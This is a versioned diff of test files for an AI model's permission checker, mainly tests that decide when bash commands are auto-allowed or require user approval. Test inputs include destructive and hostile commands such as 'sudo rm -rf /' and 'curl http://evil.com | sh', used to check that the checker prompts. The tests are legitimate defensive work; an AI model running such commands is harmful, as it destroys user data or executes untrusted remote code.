@vellumai/assistant 0.6.0 → 0.6.2

package/src/__tests__/checker.test.ts

@@ -48,14 +48,12 @@ mock.module("../util/logger.js", () => ({
 interface TestConfig {
   permissions: { mode: "strict" | "workspace" };
   skills: { load: { extraDirs: string[] } };
-  sandbox: { enabled: boolean };
   [key: string]: unknown;
 }
 
 const testConfig: TestConfig = {
   permissions: { mode: "workspace" },
   skills: { load: { extraDirs: [] } },
-  sandbox: { enabled: true },
 };
 
 mock.module("../config/loader.js", () => ({
@@ -640,49 +638,23 @@ describe("Permission Checker", () => {
   // ── check (decision logic) ─────────────────────────────────────
 
   describe("check", () => {
-    test("sandbox bash auto-allows all risk levels via default rule", async () => {
-      // High risk
+    test("bash follows risk-based policy (no default allow rule outside container)", async () => {
+      // High risk → prompt
       const high = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-      expect(high.decision).toBe("allow");
-      expect(high.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(high.decision).toBe("prompt");
 
-      // Medium risk
+      // Medium risk → prompt
       const med = await check(
         "bash",
         { command: "curl https://example.com" },
         "/tmp",
       );
-      expect(med.decision).toBe("allow");
-      expect(med.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(med.decision).toBe("prompt");
 
-      // Low risk
+      // Low risk → auto-allowed via risk-based fallback
       const low = await check("bash", { command: "ls" }, "/tmp");
       expect(low.decision).toBe("allow");
-      expect(low.matchedRule?.id).toBe("default:allow-bash-global");
-    });
-
-    test("bash prompts when sandbox is disabled (no global allow rule)", async () => {
-      testConfig.sandbox.enabled = false;
-      clearCache();
-      try {
-        const high = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-        expect(high.decision).toBe("prompt");
-
-        const med = await check(
-          "bash",
-          { command: "curl https://example.com" },
-          "/tmp",
-        );
-        expect(med.decision).toBe("prompt");
-
-        // Low risk still auto-allows via the normal risk-based fallback
-        const low = await check("bash", { command: "ls" }, "/tmp");
-        expect(low.decision).toBe("allow");
-        expect(low.reason).toContain("Low risk");
-      } finally {
-        testConfig.sandbox.enabled = true;
-        clearCache();
-      }
+      expect(low.reason).toContain("Low risk");
     });
 
     test("host_bash high risk → always prompt", async () => {
@@ -2337,11 +2309,11 @@ describe("Permission Checker", () => {
   // ── strict mode: no implicit allow (PR 21) ───────────────────
 
   describe("strict mode — no implicit allow (PR 21)", () => {
-    test("sandbox bash auto-allows in strict mode (default rule is a matching rule)", async () => {
+    test("bash prompts in strict mode (no default allow rule outside container)", async () => {
       testConfig.permissions.mode = "strict";
       const result = await check("bash", { command: "ls" }, "/tmp");
-      expect(result.decision).toBe("allow");
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("Strict mode");
     });
 
     test("host_bash prompts low risk in strict mode (default ask rule matches)", async () => {
@@ -2462,10 +2434,9 @@ describe("Permission Checker", () => {
       expect(result.decision).toBe("prompt");
     });
 
-    test("sandbox bash auto-allows high-risk via default allowHighRisk rule", async () => {
+    test("bash prompts for high-risk without default allow rule", async () => {
       const result = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-      expect(result.decision).toBe("allow");
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(result.decision).toBe("prompt");
     });
 
     test("medium-risk tool with allow rule is NOT affected by allowHighRisk", async () => {
@@ -3657,11 +3628,11 @@ describe("Permission Checker", () => {
     //    explicit matching rule. ──────────────────────────────────────
 
     describe("Invariant 1: strict mode requires explicit matching rule for every tool", () => {
-      test("sandbox bash auto-allows in strict mode (default rule matches)", async () => {
+      test("bash prompts in strict mode (no default allow rule outside container)", async () => {
         testConfig.permissions.mode = "strict";
         const result = await check("bash", { command: "echo hello" }, "/tmp");
-        expect(result.decision).toBe("allow");
-        expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+        expect(result.decision).toBe("prompt");
+        expect(result.reason).toContain("Strict mode");
       });
 
       test("low-risk host_bash prompts in strict mode (default ask rule matches)", async () => {
@@ -3709,15 +3680,14 @@ describe("Permission Checker", () => {
         expect(result.reason).toContain("Strict mode");
       });
 
-      test("high-risk sandbox bash auto-allows in strict mode (default allowHighRisk rule)", async () => {
+      test("high-risk bash prompts in strict mode (no default allow rule outside container)", async () => {
         testConfig.permissions.mode = "strict";
         const result = await check(
           "bash",
           { command: "sudo apt update" },
           "/tmp",
         );
-        expect(result.decision).toBe("allow");
-        expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+        expect(result.decision).toBe("prompt");
       });
 
       test("high-risk host_bash command with no user rule prompts in strict mode", async () => {
@@ -4130,20 +4100,39 @@ describe("Permission Checker", () => {
 
     test("getDefaultRuleTemplates tolerates partial config mocks", () => {
       const originalSkills = testConfig.skills;
-      const originalSandbox = testConfig.sandbox;
       try {
         testConfig.skills = {} as any;
-        testConfig.sandbox = {} as any;
 
         const templates = getDefaultRuleTemplates();
         expect(Array.isArray(templates)).toBe(true);
         expect(templates.some((t) => t.id.includes("extra-"))).toBe(false);
+        // bash allow rule is conditional on IS_CONTAINERIZED, not present in test env
         expect(
           templates.some((t) => t.id === "default:allow-bash-global"),
-        ).toBe(true);
+        ).toBe(false);
       } finally {
         testConfig.skills = originalSkills;
-        testConfig.sandbox = originalSandbox;
+      }
+    });
+
+    test("getDefaultRuleTemplates includes bash allow rule when IS_CONTAINERIZED", () => {
+      const orig = process.env.IS_CONTAINERIZED;
+      process.env.IS_CONTAINERIZED = "true";
+      try {
+        const templates = getDefaultRuleTemplates();
+        const bashRule = templates.find(
+          (t) => t.id === "default:allow-bash-global",
+        );
+        expect(bashRule).toBeDefined();
+        expect(bashRule!.tool).toBe("bash");
+        expect(bashRule!.pattern).toBe("**");
+        expect(bashRule!.allowHighRisk).toBe(true);
+      } finally {
+        if (orig === undefined) {
+          delete process.env.IS_CONTAINERIZED;
+        } else {
+          process.env.IS_CONTAINERIZED = orig;
+        }
       }
     });
   });
@@ -4400,22 +4389,58 @@ describe("Permission Checker", () => {
   });
 });
 
-describe("bash network_mode=proxied — no special-casing", () => {
+describe("bash network_mode=proxied — risk capped at medium", () => {
   beforeEach(() => {
     clearCache();
     testConfig.permissions = { mode: "workspace" };
     testConfig.skills = { load: { extraDirs: [] } };
   });
 
-  test("proxied bash follows normal rules (auto-allowed by default rule)", async () => {
-    // Proxied bash is no longer force-prompted — the default allow-bash rule
-    // auto-allows low/medium risk commands regardless of network_mode.
+  test("proxied bash follows risk-based policy (medium risk → prompt outside container)", async () => {
     const result = await check(
       "bash",
       { command: "curl https://api.example.com", network_mode: "proxied" },
       "/tmp",
     );
-    expect(result.decision).toBe("allow");
+    // Without the containerized bash allow rule, proxied medium-risk bash prompts
+    expect(result.decision).toBe("prompt");
+  });
+
+  test("proxied bash caps high-risk commands to medium", async () => {
+    // pipe-to-interpreter (stdin exec) is normally High risk, but proxied mode caps at Medium
+    const risk = await classifyRisk("bash", {
+      command: "cat exploit.py | python3",
+      network_mode: "proxied",
+    });
+    expect(risk).toBe(RiskLevel.Medium);
+  });
+
+  test("pipe to python3 -c is not high risk (inline code, not stdin exec)", async () => {
+    const risk = await classifyRisk("bash", {
+      command:
+        'cat data.json | python3 -c "import sys; print(sys.stdin.read())"',
+    });
+    expect(risk).toBe(RiskLevel.Low);
+  });
+
+  test("pipe to python3 without -c is high risk (stdin exec)", async () => {
+    const risk = await classifyRisk("bash", {
+      command: "cat exploit.py | python3",
+    });
+    expect(risk).toBe(RiskLevel.High);
+  });
+
+  test("proxied bash with high-risk command prompts (medium risk cap, no default allow rule)", async () => {
+    const result = await check(
+      "bash",
+      {
+        command: "cat exploit.py | python3",
+        network_mode: "proxied",
+      },
+      "/tmp",
+    );
+    // High risk capped to medium by proxied mode, but still prompts without the bash allow rule
+    expect(result.decision).toBe("prompt");
   });
 
   test("host_bash with network_mode=proxied follows normal flow", async () => {
@@ -4643,8 +4668,8 @@ describe("scope matching behavior", () => {
       { command: "npm install" },
       "/home/user/other-project",
     );
-    // npm install is Low risk, so it falls through to auto-allow via the
-    // default sandbox bash rule, not via the project-scoped rule.
+    // npm install is Low risk, so it's auto-allowed via the risk-based
+    // fallback, not via the project-scoped rule.
     // The key assertion is that the project-scoped rule is NOT the matched rule.
     if (result.matchedRule) {
       expect(result.matchedRule.scope).not.toBe(projectDir);
@@ -4726,80 +4751,37 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
     expect(result.reason).toContain("Low risk");
   });
 
-  // ── bash (sandbox) — default rule matches, workspace mode not reached ──
+  // ── bash (non-containerized) — workspace auto-allow blocked, risk-based fallback ──
 
-  test("bash in workspace with sandbox (non-proxied) → allow via default rule", async () => {
+  test("bash in workspace (low risk) → allow via risk-based fallback, not workspace mode", async () => {
     const result = await check("bash", { command: "ls -la" }, workspaceDir);
     expect(result.decision).toBe("allow");
-    // Allowed via the default sandbox bash rule, not workspace mode
-    expect(result.matchedRule?.id).toBe("default:allow-bash-global");
-  });
-
-  // ── bash sandbox gate — workspace auto-allow depends on sandbox being enabled ──
-
-  test("bash with sandbox disabled in workspace mode → falls through to risk-based policy (not auto-allowed)", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = false;
-    try {
-      const result = await check(
-        "bash",
-        { command: "echo hello" },
-        workspaceDir,
-      );
-      // Should NOT be auto-allowed via workspace mode
-      expect(result.reason).not.toContain("Workspace mode");
-      // With sandbox disabled, no default bash allow rule either, so it falls through to risk-based policy
-      expect(result.decision).toBe("allow");
-      expect(result.reason).toContain("Low risk");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
-  });
-
-  test("bash with sandbox enabled in workspace mode → auto-allowed via default rule", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = true;
-    try {
-      const result = await check(
-        "bash",
-        { command: "echo hello" },
-        workspaceDir,
-      );
-      expect(result.decision).toBe("allow");
-      // With sandbox enabled, the default bash allow rule matches before workspace mode
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
+    // Not auto-allowed via workspace mode — bash falls through to risk-based policy
+    expect(result.reason).not.toContain("Workspace mode");
+    expect(result.reason).toContain("Low risk");
   });
 
-  test("bash with sandbox disabled in workspace mode — medium risk command → prompt (not auto-allowed)", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = false;
-    try {
-      // An unknown program is medium risk; without sandbox, workspace auto-allow is blocked
-      const result = await check(
-        "bash",
-        { command: "some-unknown-program --flag" },
-        workspaceDir,
-      );
-      expect(result.reason).not.toContain("Workspace mode");
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
+  test("bash in workspace (medium risk) → prompt (not auto-allowed)", async () => {
+    // An unknown program is medium risk; without container, workspace auto-allow is blocked
+    const result = await check(
+      "bash",
+      { command: "some-unknown-program --flag" },
+      workspaceDir,
+    );
+    expect(result.reason).not.toContain("Workspace mode");
+    expect(result.decision).toBe("prompt");
   });
 
-  // ── proxied bash — follows normal rules (no special-casing) ──
+  // ── proxied bash — risk capped at medium ──
 
-  test("bash with network_mode=proxied → allow (follows normal rules in workspace mode)", async () => {
+  test("bash with network_mode=proxied → prompt (medium risk, not auto-allowed outside container)", async () => {
     const result = await check(
       "bash",
       { command: "curl https://api.example.com", network_mode: "proxied" },
       workspaceDir,
     );
-    // Default allow-bash rule auto-allows; proxied mode is not special-cased.
-    expect(result.decision).toBe("allow");
+    // Without container, bash isn't auto-allowed via workspace mode; proxied caps at medium → prompt
+    expect(result.decision).toBe("prompt");
   });
 
   // ── host tools — default ask rules prompt ──
@@ -4900,24 +4882,17 @@ describe("shell command candidates wiring (PR 04)", () => {
   });
 
   test("action key rule does not match complex chain with additional action", async () => {
-    // Disable sandbox so the default allow-bash-global rule is not emitted;
-    // otherwise the catch-all "**" pattern auto-allows every bash command.
-    testConfig.sandbox.enabled = false;
+    // Use host_bash which has no default allow-all rule, so we can verify
+    // that the action key candidate isn't generated for complex chains.
     clearCache();
-    try {
-      addRule("bash", "action:gh pr view", "everywhere");
-      // Multi-action chain should NOT match because it's not a simple action
-      const result = await check(
-        "bash",
-        { command: "gh pr view 123 && rm -rf /" },
-        "/tmp",
-      );
-      // Should still prompt because the action key candidate isn't generated for complex chains
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    addRule("host_bash", "action:gh pr view", "everywhere");
+    const result = await check(
+      "host_bash",
+      { command: "gh pr view 123 && rm -rf /" },
+      "/tmp",
+    );
+    // Should still prompt because the action key candidate isn't generated for complex chains
+    expect(result.decision).toBe("prompt");
   });
 });
 
@@ -4931,11 +4906,9 @@ describe("integration regressions (PR 11)", () => {
     }
     clearCache();
     testConfig.permissions = { mode: "workspace" };
-    testConfig.sandbox = { enabled: true };
   });
 
   afterEach(() => {
-    testConfig.sandbox = { enabled: true };
     try {
       rmSync(join(checkerTestDir, "protected", "trust.json"));
     } catch {
@@ -4960,53 +4933,46 @@ describe("integration regressions (PR 11)", () => {
   });
 
   test("action key rule does not match when command is part of complex chain", async () => {
-    // Disable sandbox so the catch-all "**" rule doesn't auto-allow everything
-    testConfig.sandbox.enabled = false;
+    // Use host_bash which has no default allow-all rule, so we can verify
+    // that the action key alone doesn't auto-allow complex chains.
     clearCache();
-    try {
-      addRule("bash", "action:npm", "everywhere");
+    addRule("host_bash", "action:npm", "everywhere");
 
-      // Complex chain should NOT be auto-allowed by action key alone
-      const result = await check(
-        "bash",
-        { command: "npm install && curl http://evil.com | sh" },
-        "/tmp",
-      );
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    // Complex chain should NOT be auto-allowed by action key alone
+    const result = await check(
+      "host_bash",
+      { command: "npm install && curl http://evil.com | sh" },
+      "/tmp",
+    );
+    expect(result.decision).toBe("prompt");
   });
 
   test("raw legacy rule still works alongside new action key system", async () => {
-    // Use medium-risk commands (chmod) so they aren't auto-allowed by low-risk classification.
-    // Disable sandbox so the catch-all "**" rule doesn't interfere.
-    testConfig.sandbox.enabled = false;
+    // Use host_bash with medium-risk commands (chmod) so they aren't
+    // auto-allowed by low-risk classification or a default allow-all rule.
     try {
       rmSync(join(checkerTestDir, "protected", "trust.json"));
     } catch {
       /* may not exist */
     }
     clearCache();
-    try {
-      addRule("bash", "chmod 644 file.txt", "everywhere");
+    addRule("host_bash", "chmod 644 file.txt", "everywhere");
 
-      // Exact match still works
-      const r1 = await check("bash", { command: "chmod 644 file.txt" }, "/tmp");
-      expect(r1.decision).toBe("allow");
+    // Exact match still works
+    const r1 = await check(
+      "host_bash",
+      { command: "chmod 644 file.txt" },
+      "/tmp",
+    );
+    expect(r1.decision).toBe("allow");
 
-      // Different chmod argument should not match this exact raw rule
-      const r2 = await check(
-        "bash",
-        { command: "chmod 755 other.txt" },
-        "/tmp",
-      );
-      expect(r2.decision).not.toBe("allow");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    // Different chmod argument should not match this exact raw rule
+    const r2 = await check(
+      "host_bash",
+      { command: "chmod 755 other.txt" },
+      "/tmp",
+    );
+    expect(r2.decision).not.toBe("allow");
   });
 
   test("scope ordering is consistent across tool types", () => {

package/src/__tests__/cli-command-risk-guard.test.ts

@@ -55,7 +55,7 @@ function expectLowRisk(command: string, actual: RiskLevel): void {
 // Dynamically extract subcommand names from the CLI program definition.
 // This ensures new commands added to program.ts are automatically covered
 // by this guard test without manual list maintenance.
-const program = buildCliProgram();
+const program = await buildCliProgram();
 const ASSISTANT_SUBCOMMANDS = program.commands.map((c) => c.name());
 
 describe("CLI command risk guard: assistant commands", () => {

package/src/__tests__/config-schema.test.ts

@@ -169,6 +169,7 @@ describe("AssistantConfigSchema", () => {
       enqueueIntervalMs: 6 * 60 * 60 * 1000,
       supersededItemRetentionMs: 30 * 24 * 60 * 60 * 1000,
       conversationRetentionDays: 0,
+      llmRequestLogRetentionMs: 7 * 24 * 60 * 60 * 1000,
     });
   });
 
@@ -421,6 +422,8 @@ describe("AssistantConfigSchema", () => {
     const result = AssistantConfigSchema.parse({});
     expect(result.permissions).toEqual({
       mode: "workspace",
+      askBeforeActing: true,
+      hostAccess: false,
     });
   });
 
@@ -1128,6 +1131,8 @@ describe("loadConfig with schema validation", () => {
     const config = loadConfig();
     expect(config.permissions).toEqual({
       mode: "workspace",
+      askBeforeActing: true,
+      hostAccess: false,
     });
   });
 

package/src/__tests__/context-overflow-approval.test.ts

@@ -55,8 +55,8 @@ describe("requestCompressionApproval", () => {
     await requestCompressionApproval(prompter);
 
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
-    // persistentDecisionsAllowed is index 9
-    expect(args[9]).toBe(false);
+    // persistentDecisionsAllowed is index 8
+    expect(args[8]).toBe(false);
   });
 
   test("includes a description in the input", async () => {
@@ -119,8 +119,8 @@ describe("requestCompressionApproval", () => {
     });
 
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
-    // signal is index 10
-    expect(args[10]).toBe(controller.signal);
+    // signal is index 9
+    expect(args[9]).toBe(controller.signal);
   });
 
   test("works without signal option", async () => {
@@ -130,7 +130,7 @@ describe("requestCompressionApproval", () => {
 
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
     // signal should be undefined when not provided
-    expect(args[10]).toBeUndefined();
+    expect(args[9]).toBeUndefined();
   });
 
   // ── Tool name constant ──

package/src/__tests__/conversation-agent-loop-overflow.test.ts

@@ -206,11 +206,13 @@ mock.module("../daemon/conversation-memory.js", () => ({
 let mockApplyRuntimeInjections: (msgs: Message[]) => Message[] = (msgs) => msgs;
 mock.module("../daemon/conversation-runtime-assembly.js", () => ({
   applyRuntimeInjections: (msgs: Message[]) => mockApplyRuntimeInjections(msgs),
-  stripInjectedContext: (msgs: Message[]) => msgs,
+  stripInjectionsForCompaction: (msgs: Message[]) => msgs,
+  findLastInjectedNowContent: () => null,
+  readNowScratchpad: () => null,
 }));
 
 mock.module("../daemon/date-context.js", () => ({
-  buildTemporalContext: () => null,
+  formatTurnTimestamp: () => "2026-01-01 (Thu) 00:00:00 +00:00 (UTC)",
 }));
 
 mock.module("../daemon/history-repair.js", () => ({
@@ -226,10 +228,6 @@ mock.module("../daemon/history-repair.js", () => ({
   deepRepairHistory: (msgs: Message[]) => ({ messages: msgs, stats: {} }),
 }));
 
-mock.module("../daemon/conversation-history.js", () => ({
-  consolidateAssistantMessages: () => {},
-}));
-
 const recordUsageMock = mock(() => {});
 mock.module("../daemon/conversation-usage.js", () => ({
   recordUsage: recordUsageMock,

package/src/__tests__/conversation-agent-loop.test.ts

@@ -195,11 +195,13 @@ mock.module("../daemon/conversation-memory.js", () => ({
 
 mock.module("../daemon/conversation-runtime-assembly.js", () => ({
   applyRuntimeInjections: (msgs: Message[]) => msgs,
-  stripInjectedContext: (msgs: Message[]) => msgs,
+  stripInjectionsForCompaction: (msgs: Message[]) => msgs,
+  findLastInjectedNowContent: () => null,
+  readNowScratchpad: () => null,
 }));
 
 mock.module("../daemon/date-context.js", () => ({
-  buildTemporalContext: () => null,
+  formatTurnTimestamp: () => "2026-01-01 (Thu) 00:00:00 +00:00 (UTC)",
 }));
 
 mock.module("../daemon/history-repair.js", () => ({
@@ -215,11 +217,6 @@ mock.module("../daemon/history-repair.js", () => ({
   deepRepairHistory: (msgs: Message[]) => ({ messages: msgs, stats: {} }),
 }));
 
-const consolidateAssistantMessagesMock = mock(() => false);
-mock.module("../daemon/conversation-history.js", () => ({
-  consolidateAssistantMessages: consolidateAssistantMessagesMock,
-}));
-
 const recordUsageMock = mock(() => {});
 const recordRequestLogMock = mock(() => {});
 mock.module("../daemon/conversation-usage.js", () => ({
@@ -471,8 +468,6 @@ beforeEach(() => {
   recordRequestLogMock.mockClear();
   syncMessageToDiskMock.mockClear();
   rebuildConversationDiskViewFromDbStateMock.mockClear();
-  consolidateAssistantMessagesMock.mockReset();
-  consolidateAssistantMessagesMock.mockImplementation(() => false);
 });
 
 describe("session-agent-loop", () => {
@@ -1944,48 +1939,6 @@ describe("session-agent-loop", () => {
       expect(drainReason).toBe("loop_complete");
     });
 
-    test("rebuilds disk view after consolidation mutates persisted history", async () => {
-      consolidateAssistantMessagesMock.mockReturnValue(true);
-
-      const ctx = makeCtx({
-        agentLoopRun: async (
-          messages: Message[],
-          onEvent: (event: AgentEvent) => void,
-        ) => {
-          onEvent({
-            type: "message_complete",
-            message: {
-              role: "assistant",
-              content: [{ type: "text", text: "done" }],
-            },
-          });
-          onEvent({
-            type: "usage",
-            inputTokens: 10,
-            outputTokens: 5,
-            model: "test",
-            providerDurationMs: 50,
-          });
-          return [
-            ...messages,
-            {
-              role: "assistant" as const,
-              content: [{ type: "text", text: "done" }] as ContentBlock[],
-            },
-          ];
-        },
-      });
-
-      await runAgentLoopImpl(ctx, "hi", "msg-consolidate", () => {});
-
-      expect(consolidateAssistantMessagesMock).toHaveBeenCalledWith(
-        "test-conv",
-        "msg-consolidate",
-      );
-      expect(rebuildConversationDiskViewFromDbStateMock).toHaveBeenCalledWith(
-        "test-conv",
-      );
-    });
   });
 
   describe("stale pending surface cleanup", () => {